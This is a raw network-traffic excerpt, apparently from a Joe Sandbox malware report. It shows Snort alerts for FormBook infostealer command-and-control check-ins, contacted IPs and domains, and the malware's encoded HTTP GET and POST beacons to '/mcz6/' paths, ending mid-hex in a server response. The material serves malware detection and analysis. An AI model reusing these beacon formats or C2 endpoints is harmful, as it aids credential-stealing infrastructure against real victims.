            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49720 -> 57.151.38.169:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49722 -> 57.151.38.169:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49723 -> 162.241.216.140:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49724 -> 162.241.216.140:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49726 -> 162.241.216.140:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49727 -> 217.160.0.111:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49728 -> 217.160.0.111:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49730 -> 217.160.0.111:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49731 -> 91.195.240.123:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49732 -> 91.195.240.123:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49734 -> 91.195.240.123:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49735 -> 162.0.237.22:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49736 -> 162.0.237.22:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49738 -> 162.0.237.22:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49739 -> 103.168.172.37:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49740 -> 103.168.172.37:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49742 -> 103.168.172.37:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49743 -> 104.37.39.71:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49744 -> 104.37.39.71:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49746 -> 104.37.39.71:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49747 -> 199.59.243.225:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49748 -> 199.59.243.225:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49750 -> 199.59.243.225:80
            Source: Joe Sandbox ViewIP Address: 217.160.0.111 217.160.0.111
            Source: Joe Sandbox ViewIP Address: 162.0.237.22 162.0.237.22
            Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
            Source: Joe Sandbox ViewASN Name: ONECOMDK ONECOMDK
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=D5+pF2/O5onkRgswN5mCVTTvHr6l6Q5GMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiEBBB3RCutNlD9KPyQG6aNo0jRjsCiw== HTTP/1.1Host: www.dty377.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global trafficHTTP traffic detected: GET /mcz6/?1Joh=jpQBXhuFRU/tY42PEy1MRCLekuE2gkbQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREibl9IXZIQ7kou/2QQYtq6MxCehvw2Hq6A==&-xl=hBllB6kp4D1dBFK HTTP/1.1Host: www.lenslaser.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global trafficHTTP traffic detected: GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1gMpqWDMKZB4BsRbutJiIudg/fevYEHw== HTTP/1.1Host: www.allinone24.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global trafficHTTP traffic detected: GET /mcz6/?1Joh=jpQBXhuFRU/tY42PEy1MRCLekuE2gkbQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREibl9IXZIQ7kou/2QQYtq6MxCehvw2Hq6A==&-xl=hBllB6kp4D1dBFK HTTP/1.1Host: www.lenslaser.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global trafficHTTP traffic detected: GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=t2ltNu02BWCxFJkDVXGm6lgSI2VyyVBo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33fhcSA/1GWguFcrikpDXwe5bKKbqlQA== HTTP/1.1Host: www.carliente.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global trafficHTTP traffic detected: GET /mcz6/?1Joh=+LASaW8sLlti/Y5moa0QLjD+NRT0ctxfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6Vq9cD+KipKFAhgCA6j04PZFMUkTXmsCQ==&-xl=hBllB6kp4D1dBFK HTTP/1.1Host: www.walletweb367.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global trafficHTTP traffic detected: GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=Z7d5vO3PiPWE/zeG4Btin5s4Ysi+TbPypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08UqI4ilaLC+vP+XuzsWsJjJ3qBfbOqHA== HTTP/1.1Host: www.deaybrid.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global trafficHTTP traffic detected: GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=WM8YJa5qA0NkIP/QQImrOwC+xPjRZGMWxn5RlfXsP+w6QT8BWCtnYGsQFWxr+5Q3wXsj3+rXjilTrq1L87WNvDgoePcC7Qc9BGKrDLvXVkg0rvhMMA== HTTP/1.1Host: www.celebration24.co.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global trafficHTTP traffic detected: GET /mcz6/?1Joh=PB65ht3xmDnV1ShZ+uHkcVi2Uq9TdnP+w4dQHmlxp9S6BIZIF1eyIZ9SallNAheKgV6/CipsbblBAwuU+20rV9UCB7jgFNORqHszkZ5HGMai3UIp4A==&-xl=hBllB6kp4D1dBFK HTTP/1.1Host: www.gledingakademiet.noAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global trafficHTTP traffic detected: GET /mcz6/?1Joh=qn3zkYHztMKe8mzhAMvQ2dUsB2FJeuQFLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOZU6owkhcBiV/M9JN6GagiG0Bu0xexw==&-xl=hBllB6kp4D1dBFK HTTP/1.1Host: www.zwervertjes.beAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
            Source: global trafficDNS traffic detected: DNS query: www.dty377.com
            Source: global trafficDNS traffic detected: DNS query: www.lenslaser.com
            Source: global trafficDNS traffic detected: DNS query: www.allinone24.shop
            Source: global trafficDNS traffic detected: DNS query: www.carliente.com
            Source: global trafficDNS traffic detected: DNS query: www.walletweb367.top
            Source: global trafficDNS traffic detected: DNS query: www.deaybrid.info
            Source: global trafficDNS traffic detected: DNS query: www.prizesupermarket.com
            Source: global trafficDNS traffic detected: DNS query: www.jrksa.info
            Source: global trafficDNS traffic detected: DNS query: www.cookedatthebottom.com
            Source: global trafficDNS traffic detected: DNS query: www.celebration24.co.uk
            Source: global trafficDNS traffic detected: DNS query: www.gledingakademiet.no
            Source: global trafficDNS traffic detected: DNS query: www.alfaspa.net
            Source: global trafficDNS traffic detected: DNS query: www.zwervertjes.be
            Source: global trafficDNS traffic detected: DNS query: www.maerealtysg.com
            Source: global trafficDNS traffic detected: DNS query: www.polhi.lol
            Source: unknownHTTP traffic detected: POST /mcz6/ HTTP/1.1Host: www.lenslaser.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.lenslaser.comReferer: http://www.lenslaser.com/mcz6/Connection: closeContent-Length: 193Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0Data Raw: 31 4a 6f 68 3d 75 72 34 68 55 52 48 36 48 6b 58 37 54 37 75 44 41 77 56 54 58 31 58 64 76 64 34 44 32 46 4c 56 56 41 6e 75 6a 79 34 73 6d 37 4d 36 64 6d 77 54 65 36 2b 34 6c 30 59 68 58 38 30 5a 36 56 57 30 30 35 73 2b 39 50 54 79 46 75 68 50 5a 4e 6c 61 4e 41 4f 6a 38 49 66 44 41 79 53 76 70 2b 50 36 65 43 63 53 70 4a 63 50 4e 39 51 56 2b 51 47 58 6b 6f 55 64 78 2b 6d 38 31 38 36 46 72 72 66 64 72 61 30 50 53 49 38 52 52 6e 76 38 36 42 6d 34 35 65 2b 4c 36 78 78 77 48 68 45 57 74 65 4d 74 4b 56 61 53 6b 48 6c 75 38 33 50 4c 61 58 2b 64 56 55 47 57 72 63 4b 72 4e 71 67 71 Data Ascii: 1Joh=ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9PTyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv86Bm45e+L6xxwHhEWteMtKVaSkHlu83PLaX+dVUGWrcKrNqgq
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 May 2024 15:19:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 May 2024 15:19:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 May 2024 15:19:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 May 2024 15:19:12 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 May 2024 15:19:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 May 2024 15:19:40 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 May 2024 15:19:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 May 2024 15:20:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 